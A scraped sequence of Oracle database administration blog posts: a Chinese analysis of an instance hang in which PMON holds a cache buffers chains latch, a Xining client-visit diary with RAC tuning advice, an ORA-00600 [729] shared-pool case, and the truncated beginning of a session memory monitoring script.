pmon长期持有cache buffers chains导致实例hang住一例

前几日,有客户报一个备用库实例中有多个回话hang住的问题,在hang住前本地有维护人员执行了truncate表的操作。
同事前往客户现场进一步确认了问题,并传回了当时hang状况下的266级systemstate文件。该实例的并发回话数量较少,所以实例状态抓取后总的信息量并不多,这种情形中通过分析systemstate信息往往要好于分析hanganalyze信息。
通过著名的源自于metalink的ass awk脚本可以很快找出各进程的状态,以及重要资源的持有者:
awk -f ass109.awk systemstate.txt

Starting Systemstate 1
…………………………………..
Ass.Awk Version 1.0.9 – Processing systemstate.txt

System State 1
~~~~~~~~~~~~~~~~
1:
2: last wait for ‘pmon timer’
3: waiting for ‘rdbms ipc message’ wait
4: waiting for ‘rdbms ipc message’ wait
5: waiting for ‘latch: cache buffers chains'[Latch 70000048c8c66b0] wait DBW0
6: waiting for ‘latch: cache buffers chains'[Latch 70000048c8c66b0] wait DBW1
7: waiting for ‘latch: cache buffers chains'[Latch 70000048c8c66b0] wait DBW2
8: waiting for ‘rdbms ipc message’ wait
9: waiting for ‘rdbms ipc message’ wait
10: waiting for ‘rdbms ipc message’ wait
11: waiting for ‘enq: RO – fast object reuse'[Enqueue RO-0001000B-00000001] wait
12: waiting for ‘rdbms ipc message’ wait
13: waiting for ‘rdbms ipc message’ wait
14: waiting for ‘rdbms ipc message’ wait
15: waiting for ‘rdbms ipc message’ wait
16: waiting for ‘SQL*Net message from client’ wait
17: waiting for ‘SQL*Net message from client’ wait
18: waiting for ‘SQL*Net message from client’ wait
19: waiting for ‘latch: cache buffers chains'[Latch 70000048c8c66b0] wait
20: waiting for ‘SQL*Net message from client’ wait
21: waiting for ‘SQL*Net message from client’ wait
22: last wait for ‘SQL*Net message from client’ [DEAD]
Cmd: Delete
23: waiting for ‘SQL*Net message from client’ wait
24: waiting for ‘SQL*Net message from client’ wait
25:
26: waiting for ‘SQL*Net message from client’ wait
27: last wait for ‘ksdxexeotherwait’
28: waiting for ‘enq: TX – row lock contention'[Enqueue TX-00120003-00002CC0] wait
Cmd: Update
29: waiting for ‘SQL*Net message from client’ wait
30: waiting for ‘SQL*Net message from client’ wait
31: waiting for ‘SQL*Net message from client’ wait
32: waiting for ‘SQL*Net message from client’ wait
33: waiting for ‘SQL*Net message from client’ wait
34: waiting for ‘Streams AQ: qmn coordinator idle wait’ wait
35: for ‘Streams AQ: waiting for time management or cleanup tasks’ wait
36: waiting for ‘Streams AQ: qmn slave idle wait’ wait
37: waiting for ‘enq: RO – fast object reuse'[Enqueue RO-00010025-00000001] wait
38: waiting for ‘SQL*Net message from client’ wait
39: waiting for ‘SQL*Net message from client’ wait
41: waiting for ‘SQL*Net message from client’ wait
42: last wait for ‘enq: TX – row lock contention’ wait
Blockers
~~~~~~~~

Above is a list of all the processes. If they are waiting for a resource
then it will be given in square brackets. Below is a summary of the
waited upon resources, together with the holder of that resource.
Notes:
~~~~~
o A process id of ‘???’ implies that the holder was not found in the
systemstate.

Resource Holder State
Latch 70000048c8c66b0 ??? Blocker
Enqueue RO-0001000B-00000001 10: waiting for ‘rdbms ipc message’
Enqueue RO-0001000B-00000001 11: 11: is waiting for 10: 11:
Enqueue TX-00120003-00002CC0 22: last wait for ‘SQL*Net message from client’
Enqueue RO-00010025-00000001 10: waiting for ‘rdbms ipc message’
Enqueue RO-00010025-00000001 37: 37: is waiting for 10: 37:

Object Names
~~~~~~~~~~~~
Latch 70000048c8c66b0 holding (efd=14) 70000048c8c66b0 Child ca
Enqueue RO-0001000B-00000001
Enqueue TX-00120003-00002CC0
Enqueue RO-00010025-00000001

首先注意到的是RO队列锁,RO即(REUSE OBJECT),该锁用以协调前台进程与后台进程DBWR和CKPT之间的工作,该队列一般只在drop或truncate对象时可见到。可以看到pid为11和37的进程均在等待pid为10的进程,因为pid=10的进程持有着它们锁需要的RO-0001000B-00000001和RO-00010025-00000001,分析dump文件可以发现该持有进程正是CKPT后台进程;

而该检查点进程也处于BUSY的非空闲等待中,其等待事件为’rdbms ipc message’,即它在等待另一个后台进程给它发送信息。这个时候我们来观察其他忙碌的后台进程可以发现,pid为5,6,7的进程均在等待同一个栓’latch: cache buffers chains'[Latch 70000048c8c66b0];这个三个进程均为DBWR进程,此外还有一个DBW3进程处于’rdbms ipc message’等待中,多个DBWR进程是由于设置了db_writer_processes参数;看起来是ckpt进程准备对需要truncate的对象做对象级别的检查点,以保证该对象所有脏块均已写到磁盘上,所以对dbwr进程发出需要写出的message,继而进入’rdbms ipc message’等待直到dbwr进程完成写出任务,但由于dbwr进程长期无法获取某脏块对应的latch: cache buffers chains,故写出工作一直处于pending状态,这样一个hang链就十分清晰了。

我们来分析’latch: cache buffers chains'[Latch 70000048c8c66b0]这个栓,ass分析systemstate dump时将该栓的holder归为’???’,即无法自dump文件中找到该栓的持有者;进一步直接分析dump文件可以发现:
PROCESS 2:
—————————————-
SO: 70000048f529d40, type: 2, owner: 0, flag: INIT/-/-/0x00
(process) Oracle pid=2, calls cur/top: 70000047d0e75a0/70000048f8956d0, flag: (e) SYSTEM
int error: 0, call error: 0, sess error: 0, txn error 0
(post info) last post received: 504403177803376304 122 2
last post received-location: kslges
last process to post me: 70000048e533a88 1 6
last post sent: 0 0 148
last post sent-location: ktmpsm
last process posted by me: 70000048e535228 1 22
(latch info) wait_event=0 bits=2
holding (efd=14) 70000048c8c66b0 Child cache buffers chains level=1 child#=61214
Location from where latch is held: kcbgcur: kslbegin:
Context saved from call: 336311247
state=busy(exclusive) (val=0x2000000000000002) holder orapid = 2
waiters [orapid (seconds since: put on list, posted, alive check)]:
5 (480, 1278471465, 0)
6 (480, 1278471465, 0)
19 (480, 1278471465, 0)
7 (216, 1278471465, 0)
waiter count=4
Process Group: DEFAULT, pseudo proc: 70000048e5f91d8
O/S info: user: oracle, term: UNKNOWN, ospid: 74476
OSD pid info: Unix process pid: 74476, image: oracle@DR_570 (PMON)

可以看到pid=2的PMON进程holding 该cache buffers chains子栓,而dbwx进程即waiters 5,6,7;

一般情况下pmon是不会去持有类似于cache buffers chains子栓这样的低级栓的,除非在cleanup失败会话或关闭实例情况下。从ass分析信息来看,当时确实有一个进程处于DEAD状态,即22: last wait for ‘SQL*Net message from client’ [DEAD],而该会话最后所做的是delete from “LINC”.”MSDB_ACCGL” t操作。

虽然无法证明,但极有可能是22号进程在进行delete过程中发生会话失败,PMON进程尝试清理该进程,并获取了相关栓。但该进程始终没有被杀死,即便使用OS 命令:kill -9 处理该进程后仍可以在systemstate中找到该进程的信息。据同事分析,当时之前曾有一度PMON的CPU使用率达到100%,之后PMON进程进入’pmon timer’空闲等待,且一直没有释放对应子栓,令DBWR进程处于长期无法获得栓资源的进而hang住的状态。

在MOS上搜索PMON+cache buffers chains可以发现几个PMON长期持有该类子栓且从不释放的Bug,但版本为Oracle 8等较老版本,且都是不能reproduceable的case。谨以录之:

Hdr: 4126734 8.1.7.4.0 RDBMS 8.1.7.4.0 BUFFER CACHE PRODID-5 PORTID-59
Abstract: ORACLE PROCESS GOES TO CPU LOOP WHILE HOLDING “CHILD CACHE BUFFERS CHAINS” LATCH

*** 01/17/05 07:08 pm ***
TAR:
—-
4249496.999

PROBLEM:
——–
1. Clear description of the problem encountered:

Oracle process goes to CPU loop while holding “Child cache buffers chains

level=1” latch. This condition causes other processes to wait on
either “latch free” or “Child cache buffers chains” which completely hang

the instance.

When looping Oracle process is killed, PMON also goes to CPU loop
cleaning
up that process. PMON also hold the same “Child cache buffers chains
level=1” latch while instance continues to hang.

Hang disappear only after instance is bounced.

2. Pertinent configuration information (MTS/OPS/distributed/etc)

11i Apps Install (version 11.5.9.) running on Oracle 8.1.7.4.0 database.

3. Indication of the frequency and predictability of the problem

Process running pl/sql procedure doing dbms_lob.instr() and
dbms_lob.read()
seem to encounter this problem.

4. Sequence of events leading to the problem

5. Technical impact on the customer. Include persistent after effects.

In a bad day, ct encounters 2 occurence of this problem a day causing
loss
of service in peak processing period.

DIAGNOSTIC ANALYSIS:
——————–
1. Got 3 systemstate dumps while hang is occuring
2. Got 3 errorstack dumps of PMON while it is looping in CPU

WORKAROUND:
———–
bounce instance

RELATED BUGS:
————-
bug 2361194

REPRODUCIBILITY:
—————-
– always reproducible on test system at ct site.

TEST CASE:
———-
– unable to reproduce on 8.1.7.4.0 test system in-house

STACK TRACE:
————
PMON stack while looping:
ksedmp ksdxfdmp ksdxcb sspuser _sigreturn kggchk kcbso1 kcbpsod kcbsod
kssxdl kssdch ksudlc kssxdl ksudlp kssxdl ksuxdl ksuxda ksucln ksbrdp
opirip opidrv sou2o main $START$

SUPPORTING INFORMATION:
———————–
Customers running Release 11i of the E-Business Suite will be entitled
to complimentary Extended Maintenance Support through July 31, 2005.

x$ksusecst 内部视图详解

9i 中v$session_wait 是Oracle wait interface的一个主要用户接口,而该动态视图的内容来源于x$ksusecst内部视图:


SQL> select view_definition from v$fixed_view_definition where view_name='GV$SESSION_WAIT';

VIEW_DEFINITION
--------------------------------------------------------------------------------
select s.inst_id,s.indx,s.ksussseq,e.kslednam, e.ksledp1,s.ksussp1,s.ksussp1r,e.
ksledp2, s.ksussp2,s.ksussp2r,e.ksledp3,s.ksussp3,s.ksussp3r, decode(s.ksusstim,
0,0,-1,-1,-2,-2,   decode(round(s.ksusstim/10000),0,-1,round(s.ksusstim/10000)))
, s.ksusewtm, decode(s.ksusstim, 0, 'WAITING', -2, 'WAITED UNKNOWN TIME',  -1, '
WAITED SHORT TIME', 'WAITED KNOWN TIME')  from x$ksusecst s, x$ksled e where bit
and(s.ksspaflg,1)!=0 and bitand(s.ksuseflg,1)!=0 and s.ksussseq!=0 and s.ksussop
c=e.indx

SQL> desc x$ksusecst
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 ADDR                                               RAW(4)
//即 v$session中 saddr 会话的起始地址
 INDX                                               NUMBER
//即 instance_id
 INST_ID                                            NUMBER
//即 sid
 KSSPAFLG                                           NUMBER
 KSUSEFLG                                           NUMBER
//该session是否仍活着, 1 为 alive
 KSUSENUM                                           NUMBER
//另一个固有编号
 KSUSSSEQ                                           NUMBER
// 相当于v$session 视图的SERIAL#列
 KSUSSOPC                                           NUMBER
// 对应x$ksled视图indx列,等待事件列表的一个序列号
 KSUSSP1                                            NUMBER
// 即v$session_wait表的p1列
 KSUSSP1R                                           RAW(4)
// 即v$session_wait表的p1raw
 KSUSSP2                                            NUMBER
// 即v$session_wait表的p2
 KSUSSP2R                                           RAW(4)
// 即v$session_wait表的p2raw
 KSUSSP3                                            NUMBER
// 即v$session_wait表的p3
 KSUSSP3R                                           RAW(4)
// 即v$session_wait表的p3raw
 KSUSSTIM                                           NUMBER
// 即v$session_wait表的wait_time,但单位为微秒
 KSUSEWTM                                           NUMBER
// 即v$session_wait表的seconds_in_wait,单位仍为秒

粗略写了一个可以代替v$session_wait视图的查询语句,过滤了可能出现的空闲等待事件,同时细化wait_time列到us级别:


select s.inst_id,
       s.indx sid,
       s.ksussseq seq#,
       e.kslednam event,
       e.ksledp1 p1text,
       s.ksussp1 p1,
       s.ksussp1r p1raw,
       e.ksledp2 p2text,
       s.ksussp2 p2,
       s.ksussp2r p2raw,
       e.ksledp3 p3text,
       s.ksussp3 p3,
       s.ksussp3r p3raw,
       s.ksusstim wait_time,
       s.ksusewtm seconds_in_wait,
       decode(s.ksusstim,
              0,
              'WAITING',
              -2,
              'WAITED UNKNOWN TIME',
              -1,
              'WAITED SHORT TIME',
              'WAITED KNOWN TIME') state
 from x$ksusecst s, x$ksled e
 where bitand(s.ksspaflg, 1) != 0
   and bitand(s.ksuseflg, 1) != 0
   and s.ksussseq != 0
   and s.ksussopc = e.indx
   and e.kslednam not in ('pmon timer',
                          'VKTM Logical Idle Wait',
                          'VKTM Init Wait for GSGA',
                          'IORM Scheduler Slave Idle Wait',
                          'rdbms ipc message',
                          'i/o slave wait',
                          'VKRM Idle',
                          'wait for unread message on broadcast channel',
                          'wait for unread message on multiple broadcast channels',
                          'class slave wait',
                          'KSV master wait',
                          'PING',
                          'watchdog main loop',
                          'DIAG idle wait',
                          'ges remote message',
                          'gcs remote message',
                          'heartbeat monitor sleep',
                          'SGA: MMAN sleep for component shrink',
                          'MRP redo arrival',
                          'LNS ASYNC archive log',
                          'LNS ASYNC dest activation',
                          'LNS ASYNC end of log',
                          'simulated log write delay',
                          'LGWR real time apply sync',
                          'parallel recovery slave idle wait',
                          'LogMiner builder: idle',
                          'LogMiner builder: branch',
                          'LogMiner preparer: idle',
                          'LogMiner reader: log (idle)',
                          'LogMiner reader: redo (idle)',
                          'LogMiner client: transaction',
                          'LogMiner: other',
                          'LogMiner: activate',
                          'LogMiner: reset',
                          'LogMiner: find session',
                          'LogMiner: internal',
                          'Logical Standby Apply Delay',
                          'parallel recovery coordinator waits for slave cleanup',
                          'parallel recovery control message reply',
                          'parallel recovery slave next change',
                          'PX Deq: Txn Recovery Start',
                          'PX Deq: Txn Recovery Reply',
                          'fbar timer',
                          'smon timer',
                          'PX Deq: Metadata Update',
                          'Space Manager: slave idle wait',
                          'PX Deq: Index Merge Reply',
                          'PX Deq: Index Merge Execute',
                          'PX Deq: Index Merge Close',
                          'PX Deq: kdcph_mai',
                          'PX Deq: kdcphc_ack',
                          'shared server idle wait',
                          'dispatcher timer',
                          'cmon timer',
                          'pool server timer',
                          'JOX Jit Process Sleep',
                          'jobq slave wait',
                          'pipe get',
                          'PX Deque wait',
                          'PX Idle Wait',
                          'PX Deq: Join ACK',
                          'PX Deq Credit: need buffer',
                          'PX Deq Credit: send blkd',
                          'PX Deq: Msg Fragment',
                          'PX Deq: Parse Reply',
                          'PX Deq: Execute Reply',
                          'PX Deq: Execution Msg',
                          'PX Deq: Table Q Normal',
                          'PX Deq: Table Q Sample',
                          'Streams fetch slave: waiting for txns',
                          'Streams: waiting for messages',
                          'Streams capture: waiting for archive log',
                          'single-task message',
                          'SQL*Net message from client',
                          'SQL*Net vector message from client',
                          'SQL*Net vector message from dblink',
                          'PL/SQL lock timer',
                          'Streams AQ: emn coordinator idle wait',
                          'EMON slave idle wait',
                          'Streams AQ: waiting for messages in the queue',
                          'Streams AQ: waiting for time management or cleanup tasks',
                          'Streams AQ: delete acknowledged messages',
                          'Streams AQ: deallocate messages from Streams Pool',
                          'Streams AQ: qmn coordinator idle wait',
                          'Streams AQ: qmn slave idle wait',
                          'Streams AQ: RAC qmn coordinator idle wait',
                          'HS message to agent',
                          'ASM background timer',
                          'auto-sqltune: wait graph update',
                          'WCR: replay client notify',
                          'WCR: replay clock',
                          'WCR: replay paused',
                          'JS external job',
                          'cell worker idle',
                          'SQL*Net message to client');

西宁旅记:管中窥豹

6月11日5点天刚蒙蒙亮,极不自然地醒过来,因为要赶飞机的缘故又是一夜没睡好;从家中打车到浦东机场需用一个多小时,抵达时已经6点半了,我要搭乘7点50分的飞机,自上海出发到西安转机到青海西宁。这次是公司在开拓青海省期间的一次技术交流,对象是西宁市的一家政府下属单位。

早晨的浦东机场已经十分忙碌,考虑到是世博期间人流更胜往常;这里是大魔都一处永不停歇的驿站,在这里人流喷涌,为这个国家带来所有未知机遇。

一行无话,11点40分抵达西安,西安的机场还是挺大的,至少在西部诸省仍是佼佼者;我一直很向往这个古老城市:秦,两汉,唐;这个城市记录了中华最辉煌的年代,在我心目中这种气度不是帝都所能比的,不过这次是无缘游访了。

1点钟不到终于到达目的地,青海省西宁市这个边陲省会;从机场向外看去一望无际的土山让生长在上海没有出过远门的我有些惊讶,西宁机场不大,虽然离地震已经过去一段时间了但仍到处插着”青海长青,玉树不倒”的标语,西宁机场目下正在扩建,灾后重建需要一个现代化的机场。

落地后赶忙和负责西北地区的张,胡两位取得了联系,他们下榻在中心广场的如家,据说是此地的市中心,而自机场打的到市区则似乎是统一的一百元;西宁市的的士规格参差不齐,但车顶上大大的广告牌似乎要比上海的还要先进,部分的士甚至是私家的车子,起步费统一的6元;上车前最好问清楚是否能给发票,不然可能会很麻烦。

载我的那位的哥十分健谈,据他介绍青海自古是移民地区,目前是以汉族为主,而部分口音类似于南京周边的方言。青海亦是三江源头为长江,黄河,澜沧江的源头汇水区,比较好玩的景区有青海湖和贵德,土产有牦牛干,人参果,裸鲤,毛毯等。谈话中时间过得飞快,期间途遇到2个收费站,让我对外地的路费有了新的认识。进入城区后先上到高架,大致可以一览市区全貌,据司机师傅介绍目前西宁市区的房价是在6千左右,要想在此处安家却也不容易啊!

在城区里穿行片刻就抵达了旅馆,与本地的2位从未谋面的同事寒暄过后,自然是要先祭祭五脏的;他们带我去旅馆旁边一个样式古老的美食城就餐,西北向来以面食出名,古来就说西北的水偏碱做面食十分相宜,其名声远胜南方,此外就多是牛羊肉,大盘鸡之属了。牛羊肉做主食,南方人多半受不了,我点了一叠面,口味尚佳,比起上海六七元的阳春面这里要便宜得多了。

吃完饭匆匆赶赴客户单位,路上竟堵了许久,想不到此处下午1点多也会有rush hour。

来到客户单位已是2点多,从客户的张科长,朱工程师口中大致了解了系统规模,这里主用的一套Linux上的RAC系统共有3个节点,硬件是三台Dell的3950 Pc Server以及一台IBM DS4700存储,三个实例接受不同地区的业务,客户目前对这套RAC系统的性能不顶满意,希望此次技术交流能够提出初步的方案,另外他们对与主机上较高的内存使用率表示疑问。

我首先抓取了RDA以及AWR报告,托福于这些工具Oracle的诊断调优信息收集已经十分集成了。这个系统居然还采用了ASM,Linux上RAC系统大致可以采取以下几种存储管理方式:裸设备(最容易也最麻烦),NFS(生产环境无法用),ASM(Oracle 推荐),OCFS2(11g被抛弃了),其他GPFS(譬如RedHat GPFS,Veritas Cluster Filesystem);10g下最时髦的管理方式还属ASM,ASM技术新颖,但普遍认为10gASM还不够成熟,至少客户应用上经验不足,一旦出现问题,除了向Oracle GCS求助外很少能找到其他解决方法。而且这套ASM系统直接使用形如/dev/sd*的块设备作为disk,不同于裸设备,使用块设备将会引起操作系统对块的进一步缓存(OS CACHE),这套系统除了跑数据库外没有其他应用,总内存为24g而每个实例使用的SGA不足5g,绝大多数内存都用作了缓存块设备。

[oracle@qhds2 ~]$ free
total       used       free     shared    buffers     cached
Mem:      16408324   16276472    131852          0      44184   13969312
-/+ buffers/cache:    2262976      14145348
Swap:      2031608      90224    1941384

如上所示空闲物理内存131852即128M,OS cache为13G。Oracle使用的高速缓存(Buffer_Cache)要较OS的cache更为有效,而目前三个实例设置的Buffer_cache为2-3G不等,建议客户调大Buffer_Cache至5-10G,同时为杜绝操作系统因物理内存不足,瞬间换页造成宕机事件发生的可能性,建议客户将Linux内核参数vm.min_free_kbytes 设置为512000(即总是保留500M的空闲物理内存)。

数据库中三个实例,整体负载(Load)处于较低的水平。相对而言1号实例最高,16小时快照内1号实例上Average Active Session(平均活动会话数,为10g中数据库负载的重要指标)为(AAS=DB_TIME/Elapsed=2327/960)2.42;2号实例上AAS为592/960=0.61;3号上AAS为1405/960=1.463。
分析AWR 报告可以发现:

1号实例:

Event Waits Time(s) Avg Wait(ms) % Total Call Time Wait Class
enq: TM – contention 98,218 40,208 409 28.8 Application
gc cr multi block request 5,877,437 36,369 6 26.0 Cluster
CPU time 8,511 6.1
gc buffer busy 64,538 5,455 85 3.9 Cluster
db file parallel read 519,589 4,116 8 2.9 User I/O

2号实例:

Event Waits Time(s) Avg Wait(ms) % Total Call Time Wait Class
CPU time 7,962 22.4
gc cr multi block request 2,903,270 6,027 2 17.0 Cluster
db file scattered read 843,958 3,070 4 8.6 User I/O
db file parallel read 421,792 3,010 7 8.5 User I/O
PX Deq Credit: send blkd 248,625 1,755 7 4.9 Other

3号实例:

Event Waits Time(s) Avg Wait(ms) % Total Call Time Wait Class
CPU time 18,381 21.8
gc cr multi block request 6,534,528 18,204 3 21.6 Cluster
db file scattered read 1,562,020 5,575 4 6.6 User I/O
db file parallel read 563,113 4,281 8 5.1 User I/O
db file sequential read 709,698 2,502 4 3.0 User I/O

主要的几个等待是:

  • ENQ:TM- Contention
  • Gc cr multi block request
  • CPU-TIME

“Gc Multi Block request”为全局缓存多块请求事件,是一种集群类等待事件。当RAC中每个实例所涉及的数据严重交叉时该事件将成为数据库的主要性能瓶颈。在不能通过改善应用程序集群适应性或对表进行实例划分分区的情况下,建议客户将RAC中的多个实例划为主用和备用实例以获取更好的性能。举例来说可以将硬件性能较好的一号主机作为主用主机,而二三号主机作为备用主机平时不接受应用程序会话,在一号主机需要OFFLINE时做应急用。客户使用RAC系统的最主要目的是为了获取高可用性,而通过向客户解释RAC Global Cache大致的工作原理后,客户首肯了这个方案。

EnQ:TM-Contention即TM锁队列等待,一般是应用程序对表执行共享级以上的表锁时(包括:S,SSX,X锁)且锁定时间过长或表上有外键约束引起的,大多数OLTP类型应用中对整个表的S,SX,X锁是不必要的,只需要行级锁(ROW LEVEL LOCK)即可以满足需要。客户本身也在怀疑应用程序存在问题,但苦于没有有力证据,无法督促开发商修改程序,又因为目前这套应用数据量,业务量都较小,这种矛盾仍不尖锐,所以总是没有行之有效地整改。

讨论完这些已将界6点,匆匆和同事回旅馆吃了晚饭。趁着天还没彻底晚,打的找了当地一个专卖土特产的超市,因为不想回去是负重过高,随便买了几包牦牛干,人参果。这忙碌的一天也就算完了,回旅馆睡觉!

第二天早晨抓紧时间再赶到客户处,另看了一套系统,因为要赶下午2点的飞机,所以行色匆匆,客户平常是使用本地java客户端的EM和10g上web形式的EM监控数据库的,在机房中的笔记本上使用SYS用户可以成功登陆,但在科室里的台式机上登陆就报用户名/密码错误的信息,初步怀疑是设置了SQLNET.ORA的某些参数,由于时间无多,这个问题只能摆脱后续的工程师解决了,呵呵!

回程仍需到西安转机,不过由于机票订得晚,经济舱已经满座了,十分不巧地做了会头等舱,也算一种福利吧。

呵呵,西宁二十四小时,对这个城市管中窥豹了!

ORA-00600: INTERNAL ERROR CODE, ARGUMENTS: [729], [10992], [SPACE LEAK] Example

The customers got  this error every alternative days on Version  9.2.0.7. They did increase the shared pool from 450MB to 704MB. Let’s see the alert.log and the last generated trace file.

SQL> l
1  select  nam.ksppinm NAME,
2  val.KSPPSTVL VALUE
3  from x$ksppi nam,
4  x$ksppsv val
5  where nam.indx = val.indx
6  and  nam.ksppinm like '%shared%'
7* order by 1
SQL> /

NAME                                                              VALUE
----------------------------------------------------------------  ----------
_all_shared_dblinks
_shared_pool_reserved_min_alloc                                   4400
_shared_pool_reserved_pct                                         5
hi_shared_memory_address                                          0
max_shared_servers                                                20
shared_memory_address                                             0
shared_pool_reserved_size                                         31876710
shared_pool_size                                                  738197504
shared_server_sessions                                            0
shared_servers                                                    0

10 rows selected.

SQL>  select FREE_SPACE,LAST_FAILURE_SIZE,REQUEST_FAILURES,LAST_MISS_SIZE  from v$shared_pool_reserved;

FREE_SPACE LAST_FAILURE_SIZE  REQUEST_FAILURES LAST_MISS_SIZE
---------- -----------------  ---------------- --------------
19018368               456               725              0

1 row selected.

Alert log
~~~~~~~~~~
Thu May 28 19:05:11 2009
Errors in file  /u01/app/oracle/admin/preg062/udump/preg062_ora_17314.trc:
ORA-00600:  internal error code, arguments: [729], [10992], [space leak], [], [],  [], [], []

Trace File
~~~~~~~~~~~
Dump file  /u01/app/oracle/admin/preg062/udump/preg062_ora_17314.trc
Oracle9i  Enterprise Edition Release 9.2.0.7.0 - 64bit Production
With the  Partitioning, OLAP and Oracle Data Mining options
JServer Release  9.2.0.7.0 - Production
ORACLE_HOME =  /u01/app/oracle/product/920preg062
System name:	SunOS
Node name:	 iccscorp
Release:	5.9
Version:	Generic_122300-22
Machine:	sun4u
Instance  name: preg062

Error
-----
ORA-00600: internal error code,  arguments: [729], [10992], [space leak], [], [], [], [], []

Current  SQL
-----------
None

Call Stack
----------
ksedmp  kgeriv kgesiv ksesic2 ksmuhe ksmugf ksuxds ksudel opilof opiodr ttcpip  opitsk opiino opiodr opidrv sou2o main start

Session info
------------
SO:  411536570, type: 4, owner: 40e583e08, flag: INIT/-/-/0x00
(session) trans: 0, creator: 40e583e08, flag: (41) USR/- BSY/-/-/DEL/-/-
DID: 0001-00F9-00000F5B, short-term DID:  0000-0000-00000000
txn branch: 0
oct:  0, prv: 0, sql: 417fbbf18, psql: 416fa9840, user: 31/MATRIXTWO
O/S info: user: matrixadmin, term: , ospid: 17281, machine: iccscorp
program: mql@iccscorp (TNS V1-V3)
last wait for  'SQL*Net message from client' blocking sess=0x0 seq=3208 wait_time=836
driver id=54435000, #bytes=1, =0

ORA-04031  details
~~~~~~~~~~~~~
Begin 4031 Diagnostic Information

Allocation  Request
-------------------
Allocation request for: kkslpkp -  literal info.
Heap: 3d6fb45f0, size: 4200

Call stack
-----------
ksm_4031_dump   ksmasg  kghnospc  kghalp  kghsupmm  kghssgai  kkslpkp  kkslpgo  kkepsl   kkecdn  kkotap  kkoiqb  kkooqb  kkoqbc  apakkoqb
apaqbd  apadrv   opitca  kkssbt  kksfbc  kkspfda  kpodny  kpoal8  opiodr  ttcpip  opitsk   opiino  opiodr  opidrv  sou2o  main

Session Info
-------------
SO:  411536570, type: 4, owner: 40e583e08, flag: INIT/-/-/0x00
(session) trans: 0, creator: 40e583e08, flag: (41) USR/- BSY/-/-/-/-/-
DID: 0001-00F9-00000F5B, short-term DID: 0000-0000-00000000
txn branch: 0
oct: 0, prv: 0, sql: 4311e4e30,  psql: 4311e4e30, user: 31/MATRIXTWO
O/S info: user: matrixadmin,  term: , ospid: 17281, machine: iccscorp
program:  mql@iccscorp (TNS V1-V3)
application name: mql@iccscorp (TNS  V1-V3), hash value=0
last wait for 'SQL*Net message from client'  blocking sess=0x0 seq=3196 wait_time=1975
driver  id=54435000, #bytes=1, =0

Number of Subpools and allocations
----------------------------------
===============================
Memory  Utilization of Subpool 1
===============================
Allocation Name          Size
_________________________   __________
"free memory              "    25065216
"miscellaneous             "    14914048

===============================
Memory  Utilization of Subpool 2
===============================
Allocation Name          Size
_________________________   __________
"free memory              "     9306608
"miscellaneous             "    19358000

===============================
Memory  Utilization of Subpool 3
===============================
Allocation Name          Size
_________________________   __________
"free memory              "    25209192
"miscellaneous             "    10192440

===============================
Memory  Utilization of Subpool 4
===============================
Allocation Name          Size
_________________________   __________
"free memory              "    15005800
"miscellaneous             "    11097176

LIBRARY CACHE STATISTICS:
namespace            gets hit ratio      pins hit ratio    reloads   invalids
--------------  --------- --------- --------- --------- ---------- ----------
CRSR            400143894     0.951 1821611655     0.969   10619950      63892
TABL/PRCD/TYPE  230543353     0.996 255666572     0.934    7504796          0

Connection  Mode & Relevant parameters
--------------------------------------
sga_max_size       = 3159332528
shared_pool_size =  738197504
db_cache_size       =  956301312
cursor_sharing      = SIMILAR
pga_aggregate_target  = 2097152000

It seems the ORA-04031 is the main issue, which triggered the ORA-00600 [729] error, after the session got abnormally terminated or killed.

Memory request failed on “shared pool” while trying to allocate 4200 bytes even though you have 9 to 25 mb of free space in 4 subpools.

I have reviewed the alert, trace and RDA report and following are my findings.

# Shared_pool_size is 738197504 and 4 subpools are used.
# Memory request failed for 4200 bytes.
# None of the components in subpools are showing any abnormal growth.

Suggestion
—————-
Issue is not exactly matching with any known bugs. Modifying the memory related parameters will help to avoid these errors.

1) Reduce the number of subpools to 2 from 4, by setting “_kghdsidx_count”=2 and restart the database. This will also help to reduce the shared pool fragmentation. Refer Note 396940.1

SQL> alter system set “_kghdsidx_count”=2 scope=spfile;

2) I have checked the memory request failure which is showing the size of 4200 bytes plus.
Set the _shared_pool_reserved_min_alloc=4000 which will help to allocate memory in reserved area, if the request is greater than 4000 bytes.

alter system set “_shared_pool_reserved_min_alloc”=4000 scope=spfile;

3) Set the shared_pool_reserved_size to 10 to 15 % of the shared pool size, by setting _shared_pool_reserved_pct parameter.

SQL> alter system set “_shared_pool_reserved_pct”=10 scope=spfile;

Implement the above changes and restart the database. This will help to avoid the shared pool fragmentation and helps to avoid the ORA-04031/ORA-00600 [729] errors.

After applying above change ,the error has not occured  again.

Script To Monitor RDBMS Session UGA and PGA Current And Maximum Usage Over Time

Script

set echo off;
set feedback off;
set heading off;
set linesize 128;
set show off;
set pagesize 55;
set trimspool on;
set verify off;
column "SID AND SERIAL#" FORMAT A19
col SNAP_COLUMN new_value SNAP_TIME
col SNAP_EOF_NAME new_value EOF_NAME
col SNAP_HOST_NAME new_value THE_HOST_NAME
col SNAP_INSTANCE_NAME new_value THE_NAME_OF_THE_INSTANCE
col SNAP_RDBMS_VERSION new_value THE_RDBMS_VERSION
set term off;
select to_char(sysdate,'YYYYMMDD_HH24MISS') "SNAP_COLUMN" from dual;
select trim(host_name) "SNAP_HOST_NAME" from v$instance;
select trim(instance_name) "SNAP_INSTANCE_NAME" from v$instance;
select trim(version) "SNAP_RDBMS_VERSION" from v$instance;
select '&THE_NAME_OF_THE_INSTANCE'||'_'||'&SNAP_TIME'||'.LST' "SNAP_EOF_NAME" from dual;
drop table maxpgauga;
create table maxpgauga as select s.sid,
s2.serial#,
n.name,
s.value,
decode(s2.username,null,s2.program,s2.username) "USERNAME",
s2.logon_time
from   v$statname n,
v$sesstat s,
v$session s2
where  n.statistic# = s.statistic# and
(s.sid = s2.sid) and
name like 'session%memory max%';
drop table curpgauga;
create table curpgauga as select s.sid,
s2.serial#,
n.name,
s.value,
decode(s2.username,null,s2.program,s2.username) "USERNAME",
s2.logon_time
from   v$statname n,
v$sesstat s,
v$session s2
where  n.statistic# = s.statistic# and
(s.sid = s2.sid) and
name like 'session%memory' and
name not like 'session%memory max%';
set term on;

spool ORACLE_MEMORY_USAGE_SNAPSHOT_&EOF_NAME

select ‘Oracle Memory Usage Report: PGA And UGA Memory Usage Per Session’ from dual;
select ‘Host……..: ‘||’&THE_HOST_NAME’ from dual;
select ‘Name……..: ‘||’&THE_NAME_OF_THE_INSTANCE’ from dual;
select ‘Version…..: ‘||’&THE_RDBMS_VERSION’ from dual;
